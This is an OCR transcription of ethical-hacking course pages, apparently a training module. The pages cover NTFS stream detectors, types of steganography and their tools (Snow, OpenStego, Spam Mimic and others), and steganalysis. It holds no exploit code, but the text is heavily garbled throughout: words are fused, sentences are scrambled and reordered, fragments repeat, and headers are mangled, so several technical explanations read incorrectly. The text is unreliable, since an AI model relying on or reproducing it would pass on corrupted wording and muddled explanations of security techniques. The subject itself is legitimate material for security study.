maintain the integrity
of NTFSpartition
filesagainst
unauthorized
ADSs.
Usethird-party
utilities to showand manipulate
hiddenstreams suchas EventSentry
SysAdmin
Tools
or
or adslist.exe,
ical andCountermensores
Mackin ©by E-Comel
Copyright
NTFSStreamDetectors
Armor
| (0)
andhidden
cleane
StreamArmordiscovers
stresme
AerateOata
ompetely
tem
NTFSStreamDetectors
Therearevarious NTFSstream detectorsavailableon the market.You can detectsuspicious
streamswiththe following
NTFSstreamdetectors. Youcan download andinstallthesestream
detectorsfromtheirwebsites.
Stream Armor
Source:https://securityxploded.com
StreamArmoris a tool usedto discover
hiddenADSsandcleanthemcompletely from
Its advancedauto analysis,
your system. coupledwith a n online threat verification
mechanism,helpsyoueradicateanyADSs that maybepresent,
shownin the screenshot,
‘As professionals
security use StreamArmorto analyze
and
detectADSstreamsi n their systems.
ical andCountermensores
Mackin ©by E-Comel
Copyright
igegegeaexamples
additional
6.131:
Figure
Steam
Armor
Secoenshot
stream detectors
of NTFS
of
are listedas follows:
StreamDetector(https://www.novirusthanks.org)
GMER(http://www.gmer.net)
(https://dmitrybrant.com)
Manager
‘ADS
Scanner(https://www.pointstone.com)
[ADS
(https://docs.microsoft.com)
Streams
6
Module 761
Page ical andCountermensores
Mackin
©
by
Copyright E-Comel
What is Steganography?
ea
estination a
manta
anography hidingsecret
technaueof
conidentayaata
withinan
message
ordinary
mesagead extractingatthe
a
Lutninggrphlclmage
acover ithe mos popular
method
to conceal
the dt In fle
ANN
Whatis Steganography?
Oneof the shortcomings of various detectionprograms is their primary focuson streaming text
data.Whatif an attackerbypasses normalsurveillance techniques andstillstealsor transmits
sensitive data? In a typical situation,after an attackermanagesto infiltrate a firm as a
‘temporaryor contractemployee, he/she surreptitiouslyseeksout sensitive information.
While
the organization
facility,
mayhavea policy
a determined
steganography.
that doesnot allowremovableelectronicequipment the
attackercan stil find waysto circumvent this byusingtechniques suchas. in
Steganography
refersto the art of hiding other datawithout the knowledge
data“behind― of
the victim. Thus,steganography hidesthe existence of a message. bits of unused
It replaces
datainto ordinaryfiles,suchas graphics,
sound, text, audio,
andvideowith other surreptitious
or ciphertext,
bits.Thehiddendata can be i n the form of plaintext and sometimes,an image.
Utilizing
@graphicimageas a cover is the most popular methodto concealthe data in files.
the detectionof steganography
Unlike encryption, can be challenging.
Thus,steganography
Forexample,
are malicious
techniqueswidely
purposes.
usedfor
attackerscan hide keylogger insidea legitimate image; thus, whenthe victim
clicks
Attackers
the
o n the image,the keylogger
alsouse steganography
capturesvictim’s
to hideinformation
keystrokes.
whenencryption is not feasible.
In terms
of security, it hidesthe file i n an encrypted format, so that even if the attackerdecrypts it, the
message will remain hidden. Attackerscan insert information suchas source codefora hacking
tool,a list of compromised servers, plans
for future attacks, communication andcoordination
channels,
etc.
ical andCountermensores
Mackin ©by E-Comel
Copyright
Classificationof Steganography
Yin
seqmogrety
WV, Semen @
6 @ —opencotes °
VYstcoher
Wunisengams GY)(W/ c omredeohen >
Y om comer
°
Classificationof Steganography
Basedo n its technique, steganography can beclassifiedinto two areas: technicaland linguistic.
In technicalsteganography, a message is hiddenusingscientific
methods, whereas i n linguistic
steganography, it is hiddeni n a carrier,
whichis the mediumusedto communicate or transfer
messages
key,
or files.Thismedium
of
comprises the hiddenmessage, carrier, and steganography
Thefollowing
diagram
depicts of steganography.
theclassification
Steganography
Semmens
—
@ )£@
—_Opencodes
Vit coher
Vaustsemynm W) (Vf « >
Y caecpner
YP)
esemagems (Y unaene .
ee
Classifiation
Figure 6.133 of steganoaraphy
6
Module 764
Page ical andCountermensores
Mackin
©
by
Copyright E-Comel
Steganography
Technical
steganography
Technical usesphysical methods,
or chemical includinginvisibleink,microdots,
andothermeans,to hidethe existence of a message.
Its difficultto categorizeall the methods
bywhichthesegoalsare achieved, but some examplescan belistedas follows:
Microdots
‘A
microdotis a text imageconsiderably
or an condensedin size (withthe helpof @
reverse fittingup to
microscope), one page i n a single dot,to avoid detectionby
unintendedrecipients.Microdotsare usually circularand about one millimeterin
diameterbut can beconvertedinto differentshapes andsizes.
Computer-Based
Methods
computer-based
‘A to digital
method makeschanges carriers to embedinformation
foreign to the native carriers, Communication
of suchinformationoccurs i n the formof
text, binary files,diskandstorage andnetworktrafficandprotocols.
devices, It can alter
software, speech, pictures,videos,
or any other digitally represented code for
transmission
Computer-based
Steganography
Techniques
Basedon the cover modificationsapplied
i n the embedding
process,steganography
techniques
can beclassified
into six groups,whichare as follows:
©Substitution
Techniques: In this technique,the attackertries to encodesecret
Informationbysubstituting the insignificant
bits with the secret message.If the
receiver knowsthe places wherethe attackerembedssecret information, then
he/she can extract the secret message.
ical andCountermensores
Mackin ©by E-Comel
Copyright
attacks.Onecan apply
the transformations
to blocksof imagesor over the entire
image.
Spread Techniques:
Spectrum is lesssusceptible
Thistechnique to interception
and
jamming.In this technique, communication signals occupymore bandwidththan
requiredto sendthe information.Thesenderincreases the bandspreadbymeans of
code(independent of data),andthe receiver usesa synchronized with the
reception
codeto recover theinformationfromthe spread spectrumdata,
Techniques:
Statistical Thistechnique steganography
utilizesthe existenceof "1-bit―
schemes the cover in sucha way that,when transmission of a “1―
bymodifying
change
some of the statisticalcharacteristics
‘occurs, significantly.
In other cases,the
cover remains unchanged, to distinguish
betweenthe modifiedand unmodified
covers. Thetheory of hypothesis statistics helps
frommathematical i n extraction.
Steganography
Linguistic
‘This
steganography
typeof
of linguistic
hidesthe message
steganography
i n the carrier another
includessemagramsandopencodes.
file.Furtherclassification
Semagrams
involvea steganography
‘Semagrams techniquethat hidesinformationwith the help of
signsor symbols. In this technique,
the user embedssome objects or symbols in the
data to change the appearance of the data to a predetermined meaning.The
classification
of sernagrams
is as follows:
©. Visual Semagrams:
Thistechnique
hidesinformationi n 2 drawing, letter,
painting,
music, or a symbol.
Text Semagrams: A text semagramhidesthe text messageby converting or
transforming the appearance of the carrier text message,suchas bychanging
font
sizesandstyles, adding extra spacesa s whitespaces andincluding
i n the document,
differentflourishesi n lettersor handwrittentext.
Open
Codes
Opencode hidesthe secret messagei n a legitimate carrier messagespecifically
designed
in a patternon a documentthat is unclearto the averagereader.Thecarrier
is sometimesalsoknownas the avert communication,
message and the secret message
ical andCountermensores
Mackin ©by E-Comel
Copyright
as the covert communication. The open-code technique
consistsof two main groups:
jargon codesandcoveredciphers.
>
Jargon a certain language
Codes:In this typeof steganography, is usedthat can be
understoodbythe particular to whomit is addressed,
groupof people while being
meaningless
to others.A jargon messageis like a substitutioncipher
i n many
individual letters,the wordsthemselvesare
but insteadof replacing
respects,
‘changed.
An example
of a jargoncodeis “cue―
code.A cue is a wordthat appearsi n
the text andthentransports
the message.
CoveredCiphers:Thistechnique hidesthe message i n a carrier mediumvisibleto
Thistypeof message
‘everyone. can be extractedbyany person with knowledge of
of cover ciphers
the methodused to hide it. Furtherclassification includesnull
ciphers
and
Null
grille
ciphers.
ciphers: A technique
usedto hidethe message within a largeamount of
data are mixedwith the unuseddata i n any order
uselessdata.The original
diagonally,
horizontally, vertically,
or i n reverse so that no one can understandit
than
who
other those knowtheorder.
Grilleciphers: A techniqueusedto encrypt plaintextbywritingit onto a sheetof
paper through a pierced sheetof paper, cardboard,
(orstenciled) or any other
similarmaterial.In this technique, one can decipher the messageusingan
identical grille.This systemis thus difficult to crackand decipher, as only
someone
grille
will
with thecorrect
the
be ableto decipherhiddenmessage.
ical andCountermensores
Mackin ©by E-Comel
Copyright
of Steganography
Types basedon CoverMedium
We
Ehrate sesacerapty Segoerphy
BEd coaiment
strane aphy
Steganography
Folder
spumfEmatSegznorzphy
DVD-ROMsteganography
VideoSteganography
‘ui Steganography
Natural
TextSteganography
0 5Steganography
Hidden
‘Whitespace
Steganography C++Source-Code
Steganography
of Steganography
‘Types basedon CoverMedium
Steganography
is the art and science of writinghiddenmessagesi n sucha way that no one
otherthantheintended knowsoftheexistenceofthemessage.
recipient Theincreasingu se of
electronicfile formats with new technologies has made data hidingpossible. Basic
steganography can be brokendown into two areas: data hiding and documentmaking.
Documentmaking dealswith protection
againstremoval.Its further classifications
of cover
mediumincludewatermarking andfingerprinting.
typesofsteganography
Thedifferent are as follows:
=
ImageSteganography:
Imagesare the most popularcover objectsused for
steganography.
In imagesteganography,
the user hidesthe informationi n imagefilesof
differentformats,
suchas PNG,JPG,
and .BMP.
Documentsteganography: In documentsteganography,
the user addswhitespaces
and
of
tabsat the ends the lines,
FolderSteganography: Folder steganography refersto hiding o ne or more filesi n a
folder.In this process,the user moves the file physicallybut still staysassociatedto its
originalfolderforrecovery.
VideoSteganography: Videosteganography is a techniqueto hide any kind offilewith
any extension i n a carrying videofile. Onecan apply
video steganography
to different
formats
of
files,
such
as .AVI,
Steganography:
‘Audio
.MPG4,
WMV,ete.
In audiosteganography,
the user embedsthe hiddenmessages
ina digital
soundformat.
ical andCountermensores
Mackin ©by E-Comel
Copyright
WhitespaceSteganography:
In whitespacesteganography,the user hidesthe messages
ASCII
in
the
text byadding
whitespaces
Web Steganography:
to the endof lines.
In web steganography,a user hidesweb objects behindother
‘objects
uploads
and
‘Spam/Email
server.
themto a web
Steganography:
Onecan use spam emailsfor secret communication by
‘embedding
the secret messages i n some way andhiding
the embedded data i n the
spamemails.Thistechniqueis referredto as spam/email
steganography.
DVD-ROM Steganography: In DVD-ROMsteganography, the user embedsthe content i n
audioandgraphicaldata,
NaturalText Steganography: Naturaltext steganography
is the process
of converting
freespeech
sensitive informationinto user-definable suchas a play.
HiddenOSSteganography:
HiddenOSsteganography of hiding
is the process one OSi n
another.
C++Source-Code Steganography: steganography,
In C++ source-code the user hidesa
set oftoolsin the files,
ical andCountermensores
Mackin ©by E-Comel
Copyright
Whitespace
Steganography
hidesASCH
text
Invite spacesteganography
theuser themestagesin
themesage
se
UsetheSNOW eneryption
ofbuiltin
makes even fit i detected
themestageunreadable
to! to hidethemessage
Whitespace
Steganography
Whitespace
steganography
is usedto concealmessagesi n ASCIIt ext byadding
whitespaces
to
the endsof the lines.Becausespacesand tabsare generally not visiblei n text viewers, the
messageis effectively
hiddenfromcasualobservers.If built-in encryptionis used,the message
cannotbereadeven ifit is detected
=
snow
Source:http://www.darkside.com.au
Snowis a program for concealing messagesi n text filesbyappending tabsandspacesto
the endsof lines,and for extracting messages fromfilescontaining hiddenmessages.
Theuser hidesthe data i n the text file byappending sequencesof up to seven spaces,
interspersedwithtabs.Thisusually allowsthree bitsto be storedeveryeight columns.
There is an alternativeencoding schemethat uses alternating spacesand tabs to
represent Osand 1s. However, users rejectedit because it uses fewerbytes but requires
more columnsper bit (4.5 vs. 2.67). An appended tab characteri s an indicationof the
start of the data,which allowsthe insertion of mail and news headerswithout
the data.
corrupting
showni n the screenshot,
‘As attackersuse the Snowtool to hide messagesi n a text file
using
the command:
following
[CQS
snow
][-p ] ] |-m ] [outfile
‘Synopsis: passwd [-Iline-len
[-ffile message
[infile J]
Options:
©
theconcealing,
Compress
-€: extracting.
dataif or it if
uncompress
ical andCountermensores
Mackin ©by E-Comel
Copyright
-Q:Quietmode.I f not set, the programreportsstatistics suchas compression
andthe amount of availablestorage
percentages spaceused
-S: Report on the approximate amount of space availablefor a hiddenmessage
in
the
-p
text file. Linelength
password:
other
i s validbut ignore
If this is set, data encryption
options
occurs with this password during
or decryption
concealment, during extraction
-line-length:
Whenappending whitespaces, Snowwill always producelinesshorter
thanthis
value.
Bydefault,
-f message-file:
the line lengthis 80,
Figure6.134:
Sereeshot
ofSnow
ical andCountermensores
Mackin ©by E-Comel
Copyright
Image
Steganography
“a. steganography,
Inimage theInformation
ishidden
in image
les
of formats
suchas
uifferent PNG, JPG,
{©image steganography
tools replace
cfect cannotbedetected
redundant
bythe humane ye of
bits image messagen suchaway
datawiththe thatthe
ImageFile Steganography
Techniques
coverage bychanging
Image
Steganography
Tools
open
stege
copa
ImageSteganography
Imagesteganographyallowsyou to concealyour secret message within an image.You can
exploit
the redundantbitsof the imageto concealyourmessage
within it. Theseredundantbits
are thosepartsof the imagethat havevery little effecto n it ifaltered.Thedetectionof this
alterationis not easy. You can concealyour informationwithin images of different formats
(e.g., JPG,BMP).
.PNG,
ical andCountermensores
Mackin ©by E-Comel
Copyright
are popular
Images objects―
“cover usedfor steganography
byreplacing
redundant
bitsof
image datawith the message,i n sucha way that humaneyes cannot detectthe effect.Image
steganographyis classified
into two types:imagedomainandtransform domain.In image
domain(spatial)techniques,a user embeds the messagesdirectly of the pixels.
i n the intensity
In transformdomain (frequency) techniques, first,thetransformationof imagesoccurs; then
the user embedsthe messagei n the image.
following
‘The figure
depicts
the imagesteganography
process andthe role of steganography
toolsin theprocess.
Covertnage
BS
eso steganosraphy
FileSteganography
Image Techniques
=
Least-Significant-Bit
The
Insertion
least-significant-bit insertion technique is the most commonlyusedtechnique
of
steganography,
image significant(LSB)
in whichthe least helps bit of eachpixel hold
secret data.TheLSBis the rightmost
method,
In the LSBinsertion binary the
of
bit of eachpixelan image.
dataof themessage are brokenup andinserted
into the LSBof eachpixel i n the imagefile in a deterministic
sequence. Modifyingthe
LSBdoesnot resulti n a visibledifferencebecause the net changeis minimalandcan be
to
the
indiscernible humaneye.Thus,its detectionis difficult.
Hiding
the data:
©. The
blue(RGB)model of
stegotool makesa copy an image palettewiththe helpof the red,green, and
6
Module Page772 ical andCountermensores
Mackin
©
Copyright
by E-Comel
4 4
!
01001000
6.136:
38
Youjust needto replace
Figure of
Example insertion
able
detect
thus to all
To retrieve this H at the other side,
the H.
the recipient
combines the LSBimagebitsandis
‘Masking
Filtering.
and
Masking
and filtering
techniques
exploitthe limitationsof humanvision, which is
of detecting
incapable slightchanges
i n images. Grayscale imagesand digital
watermarks
Masking
c an hideinformationi n a
way
similar
allowsyou to concealsecret data byplacing
to thatof watermarks o n paper.
andTransformation
Thealgorithms andtransformation technique involveshiding secret informationduring
imagecompression. In this technique, the user concealsthe informationbyapplying
various compression algorithms andtransformation functions. A compression algorithm
andtransformationuses a mathematical functionto hidethe coefficientof the leastbit
during imagecompression. Thedataare embedded i n the cover imagebychanging the
coefficientsof a transformationof an image. Generally, JPEGimages are the most
suitablefor compression, as theycan functionat differentcompression levels.This
technique provides a high levelof invisibility
of secret data.JPEGimagesuse a discrete
cosine compression.
transform
Thereare
to achieve
algorithm:
threetypesof transformation
usedi n the compression
©. FastFouriertransformation
Discretecosine transformation
Wavelet
transformation
ical andCountermensores
Mackin ©by E-Comel
Copyright
Iftheuser embedstheinformation domainof the LSBinsertion technique,
i n the spatial
informationhiddeni n the imagescan be vulnerableto attacks.An attackercan utilize
simple
signal-processing anddamage
techniques theinformation
hiddeni n the image
whenusing the LSBinsertion technique.
the imageundergoes
theseproblems,
certain processing to of
Thismay refer the loss information when
techniques like compression, To overcome
one can hidethe informationwith frequency-domain-based techniques
suchas fast Fourier transformation, discrete cosine transformation, or wavelet
Digital
transformation. dataare not continuous i n the frequency domain,Analysis of the
image data,to which frequency domain transformations are applied, becomes
extremelychallenging,
whichrenderscryptanalysis attacksdifficultto be performed,
Image
Steganography
Tools
Imagesteganography
tools detecthidden content i n imagesi n whichthe hidden data are
insertedin redundantbitsof datasources.Youcan use imagefilessuchas JPEG,GIF,BMP,and
PNGto conceal your data
=
Openstego
Source:https://www.openstego.com
OpenStego
is a steganography applicationthat provides the following
functions.
DataHiding:It can hideany datawithin a cover file (e.g,images)
© Watermarking:
Watermarking
files images)
with an
(e.g.,
beusedto detectunauthorizedfile copying,
invisiblesignature.
It can
@ opestege
FE[Wide
data
in looking
les
tari harmless
x
re Dest
Meme
Uo Adena Doaent bt
al 0) nc
watemartng
Gino
ay
mepent)
ened
nm
fy
enna
Fy vere
Atm= ==
Figure
6.137: ofOpenstogo
Screenshot
ical andCountermensores
Mackin ©by E-Comel
Copyright
Someexamples
ofimagesteganography
toolsare as follows:
*
QuickStego(http://quickerypto.com)
+
Suite Picsel(https://www.ssuitesoft.com)
+
(https://www.briggsoft.com)
CryptaPix
sifshuffle
(http://www.darkside.com.au)
StreamSteganography
PHP-Class (https://www.phpclasses.org)
Module
6 776
Page tical MakingandCountermensores
by
Copyright©
Comet
DocumentSteganography
©Documentsteganography
theof
(©tincudes
end
techniqueof hiding
isthe
adttion whitespaces
secret messages
andtabsatthe ofthelines of
i n the form documents
transferred
Stegostiek Document
fwarcon. .
Ihe suet
Audio/Video
(6, fies x,
Wave) orary foe
~
DocumentSteganography
Documentsteganography is the technique
of hiding secret messagestransferredi n the formof
documents. It includes
the additionof whitespaces andtabsat the endsof lines.A stego
documentis a cover documentcomprisingthe hidden message. Steganography algorithms,
referredto as the “stego
system,―
are employed to hidethe secret messages i n the cover
mediumat the senderend.Thesame algorithm i s usedbythe recipient to extract the hidden
message fromthe stego-document.
Thefollowing illustratesthedocumentsteganography
diagram process
YAN... =~ rNINN
mn
RL
2 —
6.138:Documentsteganography
Figure process
ical andCountermensores
Mackin ©by E-Comel
Copyright
DocumentSteganography
Tools
Documentsteganography
toolshelpin hiding suchas text or html files,
fileswithin documents,
Usingsteganography
methods.
=
Stegostick
Source:https://sourceforge.net
Stegostick is a steganographic
tool that allowsattackersto hideany file i n any otherfile.
It is based or videosteganography,
o n image,audio, whichhidesanyfileor message in
an image (BMP, etc.),audio/video
JPG,GIF, (MPG, WAV, etc.),or any other file format
(POF, EXE,CHM, etc.)
Stegestick
StegoStick
Readme
Hiding
Unttiding
Help
License
Path
Destination
EnterPassword
ek
Someexamples
+
of documentsteganography
Steg)
tools
are listedas follows:
(http://stegjsourceforge.net)
*
OfficeXML(hetpsi//www.irongeek.com)
=
(http://www.darkside.com.au)
SNOW
Data Stash(https://www.skyjuicesoftware.com)
Texto(http://www.eberl.net)
ical andCountermensores
Mackin ©by E-Comel
Copyright
Video Steganography
13
¢H
Seeeenteena ree
isomer
video such
iesof diferent
formats s.AV,.MPGS,
Pro
|
‘omnitide|
Genser
tomasTe
weno
Discrete
Cosine Transform
(OCT
manipulations
(tn/embecessnet)
oenhut
YYsustepvideo
ipa compression}
VideoSteganography
Theimage steganography discussed earliercan onlyhide a smallamount of datainsideimage
imagesteganography
cartier files.Thus, can onlybeusedwhensmallamountsofdataare to be
hiddenin the imagefiles. However, one can use video steganographywhenit is necessaryto
hidelarge amounts of datainside carrier files,
Videosteganography
refersto the hidingof secret information
in a carrier video file,The
informationis hidden i n video files of different formats,suchas .AVI,.MPG4, WMV,etc.
Discretecosine transform (DCT) manipulation is usedto addsecret data at the time of the
transformationprocessof thevideo.
Videofilescarrythe secret informationfromone endto another.Thisensures greater security
of your secret information,Numeroussecret messages can behiddenin video filesas every
frameconsistsof both imagesandsound.A s the carrier videofile is a moving stream of images
and sound,itis difficultforthe unintendedrecipient to notice the distortioni n the videofile
causeddueto the secret message,andtherefore, the messagemight go unobserved becauseof
the
continuous
steganographyof apply
all
flow thevideo.Youcan
to videosteganography.
thetechniques available
forimageandaudio
ical andCountermensores
Mackin ©by E-Comel
Copyright
The following
toolsfacilitatethe hiding
of secret information
i n runningvideosusingvideo
steganography:
= OmnitiidePro
Source:http://omnihide.com
OmniHiidePROallowsyou to hide any secret file within an innocuous image,video,
music file,etc. The user can use or sharethe resultantstego file like a normalfile
withoutanyoneknowing the hiddencontent;thus,this tool enablesyou to save your
enhance enables
secret file from pryingeyes. It also
security,
you to adda password to hideyour file and
Hide
Hide
your
data fromthosepryingeves
e@ i)
gure ScreenshotofOrmnitide
6.140: PRO
Someexamples
ofvideosteganography
toolsare as follows:
+
(https://rtstegvideo.sourceforge.net)
RTSteganography
=
(https://sourceforge.net)
Stegostick
‘=
OpenPuft(https://embeddedsw.net)
MSUStegoVideo
(http://www.compression.ru)
ical andCountermensores
Mackin ©by E-Comel
Copyright
Audio Steganography
Intrmattonin
aud es sich
a8MP3,AM, 38dWAY | S osgsaun
+2
1 akc e/a
ta/owreeoae
©steostek
msde swe
net
com)
©speeroag ipo.) I
Audio Steganography
Audiosteganography allowsyou to concealsecret messagewithin an audiofile suchas a WAV,
AU,or even MP3audiofile.it embedssecret messages i n audiofilesbyslightly changing the
binarysequenceof the audio file. Changes i n the audio file after insertion are not easily
detectable, andi n this way,the secret messages can besecured frompryingears.
The carrier audiofile shouldnot be allowedto bedistortedto avoid detectionof hidden
messages.Therefore, one shouldembedthe secret data i n sucha way that a slight change in
the audiofile can go unnoticed upon listening. Onecan hide information i n an audio file by
replacingthe LSBor byusing frequencies that are not audibleto the humanear (>20,000 H2).
if). pe)
pore
+ .
Ais >t x
"te
A
Figure6141:
Audiosteganography
process
Steganography
‘Audio Methods
Thereare certain methodsavailableto concealyour secret messages
i n audiofiles. Some
methods implement
noise signal,
techniques
thaton the
an algorithm relies inserting secret
while other methodsbelieve i n exploiting
to hideinformation.
information
sophisticated
i n the formof a
signal-processing
ical andCountermensores
Mackin ©by E-Comel
Copyright
Thefollowing
methodscan beusedto perform
audiosteganography
to hide information:
=
EchoDataHiding
In the echodata hiding method,you can embedthe secret informationi n the carrier
audiosignalbyintroducing
initial amplitude,
offsetbetween
decay rate,and offset or delay,
thecarrier signal
andechodecreases,
ofecho
an echointo it. Threeparameters are used, namely
to hide the secret data.Whenthe
theycombine at a certain pointof
time at whichthe humanear cannot distinguish betweenthe two signals. At this point,
you can heara n echoas an added resonance to the originalsignal.
However, this point
Of indistinguishable
soundsdepends on factorssuchas quality
of the original
audio
signal,
typeof sound,
andlisteneracuity.
To encode the resultantsignal
into binary
form,two differentdelay
times are used
Thesedelay times shouldbebelowthe levelof humanperception.Parameterssuchas
decayrate andinitialamplitudeshouldalsobeset belowthresholdaudiblevaluesso
thattheaudiocannot beheard.
Spread
Spectrum
Method
This method uses two versions of the spread
spectrum:direct-sequence
spread
spectrum(DSSS)
andfrequency-hopping spread (FHSS).
spectrum
Direct-Sequence
SpreadSpectrum
(DSSS):
DSSSis a frequency
modulation
technique
wherea communication devicespreads
a signal
oflowbandwidth
over a
broadfrequency
range to enablethe sharing
of a single
channelbetweenmultiple
steganography
users. TheDSSS techniquetransposes the secret messages
i n radio
wave frequencies.
DSSSdoesintroducesome randomnoise to the signal
Frequency-Hopping
SpreadSpectrum(FHSS):
In FHSS,
the user altersthe audiofile's
frequency
spectrumso that it hopsrapidlybetween frequencies. The spread
spectrummethod playsa significant
role in secure both
communications,
‘commercial
andmilitary.
LSBCoding
LSBencoding workssimilarly to the LSBinsertion technique, i n whichusers can insert a
secret binary in
message the leastsignificant bit of eachsampling point of theaudio
signal. Thismethodallowsone to hide enormous amounts of secret data.It is possible
to use the lasttwo significantbitsto insert secret binarydata, but at the riskof creating
noise in the audio file. Its poor immunity to manipulation makesthis methodless
adaptive. You can easily identify extra hidden data becauseof channel noise and
resampling.
ToneInsertion
Thismethodinvolvesembedding datai n the audiosignalbyinserting low-powertones.
for an eavesdropper
of
Thesetones are not audiblein the presencesignificantly
andthereforethe presenceof the secret message
to detectthe secret message
higher-power
is concealed.
fromtheaudiosignal.
audiosignals,
It is exceedingly
difficult
Thismethod
ical andCountermensores
Mackin ©by E-Comel
Copyright
helpsto avoidattackssuchas low-passfiltering
and bit truncation. The audio
steganography
softwareimplements
one of theseaudio steganography methodsto
‘embed
thesecret datain the audiofiles.
PhaseEncoding
Phasecoding is describedas the phase i n whicha n initial audio segment is substituted
bya reference phasethat represents the data.It encodes the secret message bitsas
phaseshiftsin the phase spectrum of a digitalsignal,achieving a soft encodingi n terms
of
the signal-to-noise
Steganography
‘Audio Tools
ratio,
* 2
retony: Ceo
Damen, of DeepSound
6.142:Screenshot
Figure
ical andCountermensores
Mackin ©by E-Comel
Copyright
Someexamples
ofaudiosteganography
toolsare listedasfollows:
=
(http://bitcrypt.moshe-szweizer.com)
BitCrypt
=
StegoStick
(https://sourceforge.net)
=
(https://www.petitcolas.net)
MP3stego
(hetp://www.quickerypto.com)
QuickCrypto
(https://github.com)
spectrology
ical andCountermensores
Mackin ©by E-Comel
Copyright
FolderSteganography
Infoldersteganography,
es are hiddenand
withina folderanddo not appear
‘encrypted
to normal Windowsapplications,
including
||cuuson Fite
fe
‘eee
Explorer
Windows
=|
Folder Tools
Steganography
viele tossed)
nse Sets 4 (ht //awwinsbleseces
Folder Steganography
Folder steganography refersto hidingsecret informationi n folders.Filesare hiddenand
encrypted within a folderand are not seen bystandardWindows applications,including
WindowsExplorer.
FolderSteganography
Tools
Attackersuse folder steganography
toolsto hideand secure foldersandhidetheir confidential
data.Thesetoolssecure foldersusingdifferentencryptiontechniques.
+
GilisoftFileLockPro
Source:http://wugilsoft.com
and driversbylocking,
GilsoftFileLockProrestricts accessto files,folders, hiding,
or
password-protecting
them,Attackerscan thususe thistool for thesepurposes.
Withthis
program,nobody
can access or destroy
the attacker'sdatawithout a password
ical andCountermensores
Mackin ©by E-Comel
Copyright
TGasoM
Fee
BroTO.8
(THN
Oey)tk
Toots
More
Settings 7
Someexamples
offoldersteganography
6.143:Screenshotof
Figure
toolsare listedasfollows:
GiSoft
File
Lock Pro
=
FolderLock(http://www.newsoftwares.net)
Hide Folders5 (https://fspro.net)
+
InvisibleSecrets4 (http://www.
invisiblesecrets.com)
Secure(https://maxpcsecure.com)
Max Folder
(hetp://www.quickerypto.com)
QuickCrypto
Module
Page 6 786
tical
Making
and byCountermensoresCopyright©
Comet
Spam/Email
Steganography 13
¢H
1 Spanverat
{©Spam
emai steganography
tothe
technique
sending
secret
communist
lp messages
secretiby
to
dain thespamemats,
byhem
eters
spam/emall
messages
of
theSecretmesages
embedding
hing
some way
n
the embedded
andhiding
Ome
Encode
Spam/Email
Steganography
Spam/email
steganography
refersto the technique
of sending
secret messagesbyembedding
themandhiding
theembedded
datain spamemails.Variousmilitary supposedly
agencies use
thistechnique
with the helpof steganography
hidea secretmessagei n an email
algorithms.
Youcan use the Spam
Mimic
toolto
‘Spam/Email
Steganography
Tool
+
Spam
Mimic
Source:http://www.spammimic.com
Spam
Mimic is spam “grammar―for a mimic enginebyPeter Wayner.Thisencodes
secret messagesinto innocent-looking spamemails.Theencoderof this tool encodes
the secret messageas spamwith a password, fakePGP,fakeRussian,
andspace.
Modul
6 787
Page ical andCountermensores
Mackin ©by E-Comel
Copyright
Figure6.14:Screenshot Mimicshowing
of Spam encoded
process
©mic
Encoded
6.145:
Figure of Spam
Screenshot
showing
Mimic encoded
output
6
Module 788
Page ical
©andCountermensores
Mackin Copyright
by E-Comel
Toolsfor Mobile Phones
Steganography
Steganography
Master Stegais
‘recanocane
mar
ical andCountermensores
Mackin ©by E-Comel
Copyright
srecanocanpny
‘macrca
—*
© Encode
t ext
© decode
t ext
6.146:
Figure of Steganography
Screenshot Master
Stegais
Source:http://stegais.com
Stegais
can hide a message
in a imagefromthe photolibrary
selected or in a photo
takenbythe camera.
STEGAIS
Screenshotof Steg
Figure 6.147
ical andCountermensores
Mackin ©by E-Comel
Copyright
Someadditional toolsformobilephones
steganography as follows:
=
SPYPIX(https://www.juicybitssoftware.com)
=
=
Messages
Pixelknot:Hidden (https://guardianproject.info)
(https://www.talixa.com)
PocketStego
‘Steganography
Image(https://play.
google.com)
(https://github.com)
Steganography
ical andCountermensores
Mackin ©by E-Comel
Copyright
Steganalysis
© steganalyss
istheat of discovering
andrendering
covert messages using
|©hdden
Process
of
ning
steganography
Mec mesae ede txt auto, and eo caer
Steganalysis
‘Some
afthesuspect
signalsolesm ayhav ielevant dataor nize encode
into
them
Steganalysis
Steganalysis
is the processof discovering
the existenceof hiddeninformationi n a medium.itis
the reverse processof steganography.
It is an attackon information
securityi n which the
attacker,
referredto hereas a steganalyst,
tries to detectthe hiddenmessages embeddedin
and videocarrier mediums
images,text, audio, usingsteganography. Steganalysisdetermines
the encodedhiddenmessage and,if possible,
recovers the message.It can detectthe message
bylooking andunusually
at variances betweenbit patterns large
file sizes.
Steganalysis aspects:
has two thedetection anddistortion
of messages. phase,
In the detection
the analyst
observesthe relationships
betweenthe steganography tools,stego-media,cover,
andmessage. phase,
In thedistortion the analyst manipulates
the stego-media
to extract the
embeddedmessage andshouldberemovedaltogether.
anddecideswhetherit is useless
Thefirst stepi n steganalysis
is to discover a suspiciousimagethat may be harboring a message.
This is an attackon the hiddeninformation. Thereare two othertypesof attacksagainst
steganography: message and chasen-message attacks.In the former, the steganalysthas
knownhiddenmessage in the corresponding stego-image. Thesteganalyst determinespatterns
that arise from hidingand detecting this message.Thesteganalyst creates a messageusing 3
knownstegotoolandanalyzes thedifferences i n patterns.In a chosen-message attack,the
attackercreates steganography mediausingthe knownmessage and steganography tool (or
algorithm)
Coverimagesdisclose m ore visualcluesthanstego-images. to analyze
It is necessary stego
images to identify the concealedinformation.Thegap betweenthe cover image and stego-
imagefile size is the simplest evidently
Manysignatures
signature. use some of the color
schemes of the cover image.
ical andCountermensores
Mackin ©by E-Comel
Copyright
Oncedetected, can destroy
an attacker a stego-image or modify the hiddenmessages.
It is
particularly
importantto understandthe overallstructure of the technologyand methodsto
detect thehiddeninformation
Somechallenges
of steganalysis
are asfollows:
the
foruncoveringactivities.
+
Suspect
informationstream may or may not haveencodedhiddendata
+
Efficientandaccurate detectionof hiddencontent within digital
magesis difficult
+
Themessage might beforebeing
havebeenencrypted insertedinto a fileor signal
Someofthe suspect files
signals may
or haveirrelevant
dataor noise encodedinto them
ical andCountermensores
Mackin ©by E-Comel
Copyright
Methods/Attackson Steganography
Steganalysis
Stego-only | ony the stage rab
objects forsale
Kaewnrateye
access
ego sachs tthe pet nto thecover mes
CChosemttego
| The
Thestackerhasacntto
aac
thesego-a betnd
parorsprobity nays
seoseth
to eat whether the gp Obie
ond
orginal dataare ee
Methods/Attackson Steganography
Steganalysis
Steganographyattackswork according to the typeof informationavailablefor the steganalyst
to perform steganalysis
on. Thisinformation may includea hiddenmessage, carrier (cover)
medium, stego-object,steganography tools,or algorithmsusedfor hiding information.Thus,
of steganalysis
